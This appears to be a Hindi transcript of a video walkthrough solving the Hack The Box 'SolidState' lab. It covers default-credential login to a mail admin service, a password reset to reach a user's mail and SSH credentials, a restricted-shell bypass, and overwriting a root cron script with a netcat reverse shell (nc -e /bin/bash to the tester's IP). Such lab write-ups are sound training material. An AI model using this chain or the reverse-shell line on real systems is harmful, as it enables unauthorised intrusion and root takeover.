हेलो गाइस, वेलकम बैक टू आवर चैनल। आज हम लोग हैक द बॉक्स का सॉलिड स्टेट लैब सॉल्व करने वाले हैं। ये एक लिनक्स लैब है एंड मीडियम में काउंट किया जाता है। सो हम लोग एज यूजुअल nmap स्कैन के साथ शुरुआत करेंगे। इसका nmap स्कैन थोड़ा टाइम लेता है, इसके लिए मैंने ऑलरेडी nmap स्कैन लगा के रखा था। एकदम सिंपल कमांड मैंने यूज़ किया। थोड़ा जूम इन कर लेता हूँ। nmap-vv वर्बोज मोड के लिए, ताकि हम लोग देख पाए यहाँ पे रन टाइम में कि कौन से पोर्ट्स ओपन है। -p लगाया ताकि हम लोग सब पोर्ट्स को डिस्कवर कर पाए, एंड -t4 लगाया ताकि स्कैन थोड़ा फास्ट हो, टाइम बचे अपना। ठीक है, तो यहाँ पे हम लोग को 6 पोर्ट ओपन मिला है, 22, 25, 80, 1110, 119 एंड 4555। तो इसमें से 4555 एक थोड़ा यूनिक पोर्ट लग रहा है, एंड इसके ऊपर सर्विस जो रन हो रहा है दैट इज़ RSIP। तो हम लोग क्या करते हैं, फायरफॉक्स को ओपन कर लेते हैं एंड यहाँ पे हम लोग सर्च करते हैं 4555 RSIP। पहला ही जो लिंक आ रहा है उसको ओपन कर लेंगे हम लोग। ओके, सो पहला लिंक ओपन करने के बाद हमको ये पता चल रहा है कि फॉरवर्डिंग एडमिन्स मेल करके यहाँ पे लिखा हुआ है, एंड बेसिकली आई थिंक सो ये मेल मैनेजमेंट का सर्विस है जो यूज़ होता है। यहाँ से हम लोग यूज़र्स को मैनेज कर सकते हैं। सो हम लोग क्या करते हैं, इसको कनेक्ट कैसे करना है, कनेक्ट थ्रू नेटकैट के थ्रू कनेक्ट होता है। netcat-nv IP एड्रेस एंड पोर्ट नंबर देना, एंड कैन टेस्ट फॉर क्रेड्स। सो क्रेड्स पूछ सकता है ये। सो हम लोग कनेक्ट करते हैं इसको। कैसे करेंगे, nc-nv IP एड्रेस देना है मशीन का, दैट इज़ 10.10.10.51 एंड पोर्ट नंबर दैट इज़ 4555। एंटर करेंगे। यहाँ पे दिख रहा है अपने को ये ओपन है, नेटकैट ने बताया कि ये ओपन है। लेट्स वेट कि आगे क्या हो रहा है। यहाँ पे लॉगिन आईडी पूछ रहा है। सो हम लोग डिफ़ॉल्ट क्रेडेंशियल्स ट्राई करेंगे, दैट इज़ रूट, एंड पासवर्ड भी हम लोग पास करेंगे रूट। रूट देने के बाद यहाँ पे वेलकम रूट बता रहा है, दैट मीन्स क्रेडेंशियल सही थे। एंड और कमांड जानने के लिए हम लोग को यहाँ पे लिखा है कि हेल्प फॉर अ लिस्ट ऑफ कमांड्स। और कमांड जानने तो हमको हेल्प टाइप करना है। लेट्स टाइप हेल्प डालने के बाद यहाँ पे हम लोग को एक कमांड का लिस्ट मिल गया पूरा का पूरा, जैसे कि लिस्ट यूज़र से काउंट यूज़र है, ऐड यूज़र है, डिलीट यूज़र है, वेरीफाई है, सेट पासवर्ड है, सेट अलियास है। सो हम लोग क्या करेंगे, लिस्ट यूज़र कर लेते हैं सबसे पहले। लिस्ट यूज़र्स करने के बाद हम लोग को 5 यूज़र मिले, जेम्स, थॉमस, जॉन, मिंडी एंड मेल एडमिन। सो हम लोग क्या करते हैं, लेट्स ट्राई टू सेट पासवर्ड फॉर मिंडी यूज़र के लिए पासवर्ड सेट करते हैं। तो कैसे करेंगे, सेट पासवर्ड मिंडी, एंड हम लोग इसका पासवर्ड भी देते हैं मिंडी। सो पैटर्न क्या था यहाँ पे देखो, सेट पासवर्ड यूज़र नेम। सो यूज़र नेम हम लोग ने पास कर दिया मिंडी, एंड पासवर्ड सेट करना है। सो पासवर्ड भी हम लोग ने क्या रखा, मिंडी रखा है। एंटर करेंगे, पासवर्ड फॉर मिंडी रीसेट। सो मिंडी का पासवर्ड रीसेट हो गया है। सो अभी हम लोग को कनेक्ट करना है। सो हम लोग यहाँ पे एक मेल सर्विस यूज़ करने वाले, एक मेल एप्लीकेशन यूज़ करने वाले जिसका नाम है थंडरबर्ड, जो काली लिनक्स के अंदर ऑलरेडी होता है। सो इसको यूज़ कैसे करते हैं, यहाँ पे लोकल फोल्डर ओपन हो गया, ईमेल के ऊपर क्लिक करेंगे। यहाँ पे फुल यूज़र नेम बोला, मैं मिंडी दे देता हूँ, आप कुछ भी दे सकते हो। मिंडी ईमेल एड्रेस में अपने को देना है mindy@10.10.10.51। अभी मैंने यहाँ पे 10.10.10.51 क्यों लिखा, क्योंकि अपना टारगेट मशीन है। सो बेसिकली ये डोमेन को रेफ़र करेगा कहीं ना कहीं। और कंपनीज़ का ईमेल एड्रेस कैसा होता है, एम्प्लॉय नेम @कंपनी का नाम रहता है .com ऐसा रहता है। ठीक है, तो मैंने इसके लिए यहाँ पे इसको होस्ट नेम दे दिया, मतलब बेसिकली अपना टारगेट का IP एड्रेस दे दिया। एंड पासवर्ड हमने क्या सेट किया था, मिंडी। ठीक है, ये सब सही सेट किया। अभी कॉन्फ़िगर मैन्युअली पे क्लिक करना है, एंड IMAP की जगह पे हम लोग को POP3 सिलेक्ट करना है। यहाँ पे होस्ट नेम से मैं डॉट हटा देता हूँ, पोर्ट रख रहा हूँ मैं 110, दैट इज़ POP3 का पोर्ट नंबर। कनेक्शन सिक्योरिटी में कुछ नहीं करना है, सेम रखना है। ऑथेंटिकेशन मेथड में हम लोग को नॉर्मल पासवर्ड सेट कर देना, एंड यहाँ से हम लोग यूज़र नेम में बस मिंडी रखेंगे, बाकी सब हटा देंगे। ठीक है, दिस वाज फॉर इनकमिंग सर्वर। एंड आउटगोइंग सर्वर में पोर्ट जो है उसको 25 सेट करेंगे SMTP, एंड ऑथेंटिकेशन मेथड को नॉर्मल पासवर्ड। ठीक है, बस इतना ही करना। उसके बाद हम लोग क्लिक करेंगे डन पे। यहाँ पे एक वार्निंग दे रहा है कि डज नॉट यूज़ इंक्रिप्शन, जो भी अपना टारगेट है वो इंक्रिप्शन यूज़ नहीं कर रहा है। तो हम लोग क्या करते हैं, आई अंडरस्टैंड द रिस्क के ऊपर क्लिक करेंगे एंड देन कन्फर्म। ठीक है, यहाँ पे चेकिंग पासवर्ड आ रहा है, वेट करते हैं जब तक सर्वर से कंफर्म आ रहा है कि अपना क्रेडेंशियल सही है कि नहीं है। यहाँ पे अकाउंट सक्सेसफुली क्रिएटेड आ गया।
ठीक है, यहाँ पे ऊपर एक इनबॉक्स का बेसिकली मेल का एक आइकन दिख रहा है, उसके ऊपर क्लिक करेंगे एंड इनबॉक्स के ऊपर जाएंगे। यहाँ पे देख सकते हो मिंडी यूज़र का है। सो इनबॉक्स में हम लोग को दो मेल दिख रहे हैं। फर्स्ट मेल को ओपन करेंगे, जूम करते हैं। सो यहाँ पे डियर मिंडी वेलकम टू अ सॉलिड स्टेट सिक्योरिटी साइबर टीम। सो बेसिकली एक अपॉइंटमेंट मेल दिख रहा है। एंड सेकेंड मेल को ओपन करेंगे। सो यहाँ पे लिखा है डियर मिंडी हियर आर योर SSH क्रीडेंशियल्स टू एक्सेस द सिस्टम। सो बेसिकली यहाँ पे SSH के क्रीडेंशियल्स दिए गए हैं। तो मैं ये पासवर्ड को कॉपी करता हूँ एंड हम लोग मिंडी का SSH एक्सेस लेते हैं। SSH मिंडी @10.10.10.51 के ऊपर जाते हैं, एंटर करते हैं। पासवर्ड पूछ रहा है, पासवर्ड पेस्ट करेंगे, एंटर। सो हम लोग को मिंडी का SSH मिल चुका है। ls करूँ, सो यहाँ पे user.txt फाइल है, bin है, एंड cd bin करूँ। सो हम लोग को आ रहा है कि r bash cd restricted। सो बेसिकली ये रिस्ट्रिक्टेड बैश शेल है। सो मैं क्या करता हूँ, यहीं पे एक न्यू टैब ओपन करता हूँ एंड वापस मिंडी का एक्सेस लेंगे। कैसे लेंगे, SSH मिंडी @10.10.10.51। अभी -t फ्लैग लगा के हम लोग लिखेंगे बैश --no प्रोफाइल। ठीक है, अभी मैंने यहाँ पे -t डबल कोट्स के अंदर बैश -no प्रोफाइल इसके लिए लिखा है क्योंकि हम लोग यहाँ पे अभी बाईपास करने वाले हैं रिस्ट्रिक्शन को जो मिंडी के SSH के ऊपर लगा हुआ है। ठीक है, एंटर करूँगा। पासवर्ड के लिए पूछ रहा, पेस्ट करूँगा एंड अभी हम लोग को मिल गया। ठीक है, ls करूँगा, cd bin करके देखूँगा। अभी हम लोग cd के bin के अंदर आ गए, यहाँ पे देखना। ठीक है, तो मैं क्या करता हूँ, cd/temp में जाता हूँ, cd/temp एंड सबसे पहले हम लोग sudo -l करके देखेंगे कि कोई फाइल दिखता है कि हम लोग को। sudo -l करने के बाद हमको आ रहा है कमांड नॉट फाउंड। ठीक है, तो हम लोग sudo -l नहीं कर पाएंगे। सो मैं क्या करता हूँ, नए टैब में जाके cd/opt में जाता हूँ। opt के अंदर peas-ng/linpeas के अंदर मेरा linpeas का फाइल है। ठीक है, यहाँ पे फाइल है, तो मैं क्या करूँगा, python -m http सर्वर। सो बेसिकली मैंने मेरे फोल्डर के अंदर http सर्वर चालू कर दिया। अभी हम लोग वापस SSH में जाके wget करेंगे, wget http://10.10.14.13। ये क्या है, ये मेरा IP एड्रेस है। मेरे को कैसे पता चला, अगर हम लोग यहाँ पे ऊपर देख सकते हैं VPN पे कनेक्टेड है, ifconfig, ये देखो दिख रहा है। सो ये मेरा IP एड्रेस है। /linpeas.sh करेंगे, एंटर कर दे। प्रोसेस 100% कंप्लीट हो गया। ls करेंगे तो यहाँ पे linpeas.sh हम लोग को दिख रहा। सबसे पहले परमिशन देते हैं एग्जीक्यूशन का, +x करेंगे, linpeas.sh, एंटर। अभी /linpeas रन करेंगे। ठीक है, linpeas क्या था मैंने बताया था। linpeas एक बेसिकली ऐसा स्क्रिप्ट है जो पोटेंशियल बोल सकते हैं एंट्री पॉइंट्स या फिर पोटेंशियल फाइल्स, परमिशंस, कॉन्फ़िगरेशन चेक करता है, जिससे हम लोग लिनक्स प्रिविलेज एस्केलेशन कर सकते हैं। ठीक है, सो जो भी रेड हाईलाइटेड होगा उसके ऊपर हम लोग को ध्यान देना है, ऐसा ये स्क्रिप्ट द्वारा कहा गया है। सो इसको रन होने देते हैं। अब इसका लिनक्स वर्जन यहाँ पे दिख रहा है हम लोग को। ठीक है, यहाँ पे कुछ लिनक्स एक्सप्लॉइट सजेस्टर ने एक्सप्लॉइट्स दिए हैं, ये हम लोग ट्राई कर सकते हैं बेसिकली। ठीक है, एक चीज़ ध्यान रखना, ज़रूरी नहीं है हर चीज़ जो रेड हाईलाइटेड है वहाँ से हम लोग लिनक्स प्रिविलेज एस्केलेशन कर सकते हैं, या फिर उसकी मदद से हम लोग लिनक्स प्रिविलेज एस्केलेशन कर सकते हैं। पे यूज़र का इन्फॉर्मेशन मिल रहा है, दैट इज़ मिंडी, जिससे हम लोग लॉगिन है। सुपर यूज़र के पास /bin/bash है। ये सारा यूज़र्स एंड ग्रुप्स दिखा रहा है यहाँ पे।
हम लोग यहाँ पे कुछ अनयूजुअल ढूंढने का कोशिश कर रहे थे बट लिनपीस में हम लोग को एज सच कुछ मिला नहीं। तो हम लोग क्या करते हैं, इसको पाइथन का सर्वर बंद करता हूँ मैं, cd/op में जाता हूँ एंड यहाँ पे एक PSPY32 करके है। तो ये क्या है, ये वो स्क्रिप्ट है जो करंट रनिंग प्रोसेसेस दिखाता है मशीन के अंदर। तो हम लोग इसको लेते हैं वहाँ पे। सो कैसे लेंगे, अगेन wget, जो हम लोग ने पहले कमांड डाला था वही डालेंगे, बट बस इस बार यहाँ पे लिनपीस की जगह पे PSPY32 फाइल का नाम रहेगा। एंड मैं यहाँ पे पाइथन का सर्वर चालू करता हूँ, पाइथन -m HTTP सर्वर। ठीक है, चालू किया। अब यहाँ पे एंटर करेंगे। PSPY32 हम लोग ने ले लिया है। इसका परमिशन चेंज करेंगे, chmod +x PSPY। आया कि नहीं आया, LS आया नहीं है, तो एक बार वापस wget करते हैं। LS दिख रहा अभी, chmod +x PSPY32 एंटर करेंगे ./PSPY32। ठीक है, तो ये रन कर रहा है। अभी ये जो भी प्रोसेस रन हो रहा है उसके बारे में बता रहा है। सो लेट्स सी कि यहाँ पे क्या क्या प्रोसेस रन होता है। ये शायद हमने किया था bash-no profile, राइट। यूजर हैज बिन cronf। यहाँ पे कोई तो क्रॉन जॉब चल रहा है। ठीक है, कौन सा क्रॉन जॉब चल रहा है अभी वो अपने को देखना पड़ेगा। वेट करते हैं यहाँ पे आके, कुछ दिखता। अगर क्रॉन जॉब रहेगा तो अगले 4-5 मिनट के अंदर हम लोग को नीचे वो क्रॉन जॉब दिख जाएगा। मेरे को कैसे पता चला कि क्रॉन जॉब रन होना है, तो यहाँ पे देखो क्रॉन फाइल जो है एसबिन के अंदर उसका यूज़ किया गया है। ठीक है, ये देखो यहाँ पे क्रॉनफ रन हुआ है एंड क्या रन कर रहा है, bin/sh-c पाइथन opt/temp.py करके फाइल है, ये रन कर रहा है वो। सो मैं क्या करता हूँ, इसको कॉपी करता हूँ। अभी के लिए मैं ये टूल को रोक देता हूँ एंड क्लियर करता है। सो अगर हम लोग ls-l करें, हम लोग को पता चल रहा है कि ये फाइल को सब परमिशन है। 777 है बेसिकली, रीड राइट एग्जीक्यूट का हर ग्रुप को, यूज़र को एंड बेसिकली रूट को भी परमिशन है। एंड दिस फाइल इज़ ओन बाय रूट। ठीक है, तो इसको रूट एग्जीक्यूट कर रहा है। सो हम लोग कैट करके देखते हैं ये फाइल के अंदर क्या है। कैट करने के बाद एकदम सिंपल फंक्शन है जहाँ पे os.system से एक कमांड रन किया जा रहा है। कमांड क्या है, rm-r temp *। तो अगर मैं टेम्प फोल्डर में कुछ भी डाल रहा हूँ तो वो उड़ जा रहा है। इसके लिए जब हम लोग ने पहले आपने देखा रहेगा कि हम लोग ने लिनपीस फाइल डाला था, बट आफ्टर सर्टन टाइम वो दिख नहीं रहा था। एंड जब मैं वापस से PSPY32 फाइल लिया तो वो भी थोड़ी देर बाद जैसे ही मैंने लिया, आई थिंक सो, तब उसका इंटरवल हो गया था एंड क्रॉन जॉब रन हो गया एंड आफ्टर 1-2 सेकेंड्स वो PSPY उड़ गया था। ठीक है, इसकी वजह से हम लोग को वो दिखा नहीं था, वापस हम लोग को डाउनलोड करना पड़ा था। तो मैं क्या कर सकता हूँ, इसको एडिट कर सकता हूँ एंड यहाँ पे मैं बेसिकली नेटकैट का कमांड डाल के मैं अपने इस पर शेल ले सकता हूँ रूट का। सो वो कैसे करेंगे मैं बताता हूँ। सबसे पहले मैं क्या करूँगा, यहाँ पे बाजू में एक ये ओपन कर लेता हूँ अपना टर्मिनल एंड यहाँ पे नेटकैट डाल देता हूँ LVMP 9001। ठीक है, एंड अभी हम लोग यहाँ पे आएंगे एंड बोलेंगे nano /opt/temp.py। ठीक है, एंटर करता हूँ।
नैनो में ये ओपन हो गया। अभी यहाँ पे जाते हैं। हाँ, अभी यहाँ पे हम लोग एडिट करेंगे, इसको हटा देंगे। इस कमांड की जगह पे हम लोग को क्या करना है, nc-e/bin/bash एंड यहाँ पे फिर अपना IP एड्रेस डालेंगे 10.10.14.13.900 जो हम लोग का नेटकैट का लिसन का पोर्ट डाला है वो, एंड कंट्रोल एक्स करते हैं। येस, वी वांट टू सेव द चेंजेस, एंटर करेंगे। अभी अगर मैं कैट करता हूँ /opt temp.py को, तो यहाँ पे हम लोग का कमांड डाल दिया। ठीक है, देखिए अभी जैसे ही ये मैंने डाला, यहाँ पे थोड़े टाइम के बाद जो ऊपर का क्रॉन जॉब था वो रन हो गया। ठीक है, एंड यहाँ पे हम लोग को कनेक्शन रिसीव्ड हुआ है। अब यहाँ पे नीचे शेल नहीं दिख रहा है जैसा हम लोग को यहाँ पे दिख रहा था, बट अगर मैं ls करूँ सो वी कैन सी root.txt फाइल हम लोग को दिख रहा है। whoami करूँ सो हम लोग यहाँ पे एज अ रूट लॉग्ड इन है। सो ये लैब बहुत सिंपल था, इसको मीडियम में डाला है हैक द बॉक्स ने, बट ये उतना हार्ड था नहीं। इनिशियली जस्ट हम लोग को ये चीज़ें समझना था कि वो जो यूनिक पोर्ट है वो क्या है, एंड उसके ऊपर ऑलरेडी एक्सप्लॉइट था। ठीक है, मैंने जो आर्टिकल दिखाया उसका अलावा आपको बहुत सारे और आर्टिकल्स भी दिख सकते हैं जो मैंने ये दिखाया था। सो जहाँ पे आपको कंप्लीट स्टेप पता चलेगा। स्टेप वाज रियली सिंपल, हम लोग को नेटकैट के थ्रू उसको एक्सेस करना है, एंड एक्सेस करने के बाद डिफ़ॉल्ट क्रेडेंशियल्स था। सो फर्स्ट वल्नरेबिलिटी ये था कि ये पोर्ट ओपन था। सेकंड वल्नरेबिलिटी ये था इसमें कि यहाँ पे बेसिकली डिफ़ॉल्ट क्रेडेंशियल्स के साथ हम लोग लॉगिन कर पा रहे थे, एंड ड्यू टू दैट वो क्रेडेंशियल्स भी एडमिन का रूट का क्रेडेंशियल्स था, जिसकी वजह से हम लोग किसी भी यूज़र का पासवर्ड चेंज कर पा रहे थे। तो हम लोग को पता चला कि 5 यूज़र्स है जिसमें से हम लोग ने एक यूज़र का पासवर्ड चेंज किया, एंड जो हम लोग का थंडरबर्ड टूल है उसका कॉन्फ़िगरेशन करके वहाँ पे क्रेडेंशियल्स डाल के हम लोग ने उसका मेल का एक्सेस लिया। सो मेल का एक्सेस लेने के बाद वहाँ पे हम लोग को यूज़र का SSH मिला, SSH क्रेडेंशियल्स मिला, यूज़र का SSH क्रेडेंशियल्स लिया। तब हम लोग को पता चला कि ये जो SSH का शेल हमको मिला है वो रिस्ट्रिक्टेड है। तो उसको बाईपास करने के लिए हम लोग ने एक कमांड यूज़ किया था, दैट इज़ -, नो प्रोफाइल करके, राइट, बैश -, नो प्रोफाइल, ये हम लोग ने यूज़ किया था, जिसकी वजह से हम लोग को वो बाईपास हुआ एंड हम लोग को एक फुल शेल मिल गया था। जिसके बाद हम लोग ने जब sudo -l रन करने का कोशिश किया तो हम लोग को पता चला कि यहाँ पे sudo है ही नहीं। फिर हम लोग ने linpiz रन किया। linpiz में हम लोग को opt/temp.py फाइल नहीं मिला। ये पॉसिबल है, ऐसा हो सकता है कि कभी कभी नहीं मिलता। ठीक है, तो वहाँ पे हम लोग को ये फाइल तो नहीं मिला, बट हम लोग ने कुछ और चीज़ें देखने का कोशिश किया। हम लोग को एज सच कुछ पोटेंशियल मिला नहीं जिससे हम लोग प्रिविलेज एस्केलेशन कर सकते हैं। उसके बाद PSPY हमने रन किया। मोस्ट ऑफ द टाइम क्या होता है, ये जो भी मशीन्स रहता है, लैब्स रहता है, उनमें क्रॉन जॉब रन होते रहता है, एंड फाइल्स के अंदर हम लोग को एडिट करके रूट का एक्सेस लेना रहता है। सो सेम लॉजिक हम लोग ने यहाँ पे यूज़ किया। हम लोग ने PSPY32 जो फाइल है, स्क्रिप्ट है, उसका यूज़ करके हम लोग सब लिसन कर रहे थे कि अभी कौन सा प्रोसेस रन हो रहा है। और जब हम लोग को पता चला कि वहाँ पे एक temp.py फाइल रन हो रहा है आफ्टर सर्टन इंटरवल, जो क्रॉन जॉब के थ्रू रन किया जा रहा है, और उसको यहाँ पे रीड राइट एग्जीक्यूट का एक्सेस था सबको। अब दिस फाइल वाज ओन्ड बाय रूट, सो रूट इसको एग्जीक्यूट कर रहा था, बट परमिशन सबको था फॉर एडिटिंग। सो मैंने क्या किया, ये फाइल को रीड किया, हम लोग ने देखा कि यहाँ पे क्या हो रहा है। सो यहाँ पे बेसिकली एक os.system, सो os को इंपोर्ट करने के बाद सिस्टम फंक्शन है पाइथन का, उसमें वो क्या कर रहा है, सिस्टम कमांड रन कर रहा है। तो वहाँ पे वो रिमूव का कमांड दे रहा था, जो ये था कि टेम्प फाइल के अंदर जो भी डाला जाए वो रिमूव हो आफ्टर सर्टन टाइम। जैसे वो क्रॉन रन हो रहा था, टेम्प के अंदर से सब चीज़ें डिलीट हो रहा था। तो हमने उसको रिप्लेस करके क्या डाला, netcat -e/bin/bash, मतलब हम लोग बोल रहे कि हमको बैश शेल देना, और किस पे देना हम लोग को बैश शेल, मतलब किस पे हम लोग को शेल चाहिए था, 10.10.14.13। ये क्या है, ये बेसिकली हमारा IP एड्रेस है, एंड हम लोग ने 9001 पोर्ट दिया जिसके ऊपर हम लोग ने नेटकैट चालू किया था यहाँ पे। जैसे ही वो टाइम ख़त्म हुआ एंड जब वो क्रॉन जॉब रन हुआ, उसके अंदर temp.py था, जैसे ही वो रन हुआ हम लोग को यहाँ पे कनेक्शन रिसीव हुआ था, राइट। एंड जैसे ही कनेक्शन मिला, वी गॉट द एक्सेस टू द रूट यूज़र, हम लोग ने whoami करके देख लिया था। ठीक है, सो ये लैब के लिए इतना ही था। मिलते हैं अगले लैब में। कमेंट्स में ज़रूर बताना कि लैब कैसा लगा, एंड इफ़ यू वांट एनी स्पेसिफिक लैब तो ये भी मेरे को कमेंट में बताना, एंड डोंट फॉरगेट टू लाइक, शेयर एंड सब्सक्राइब। थैंक यू गाइज।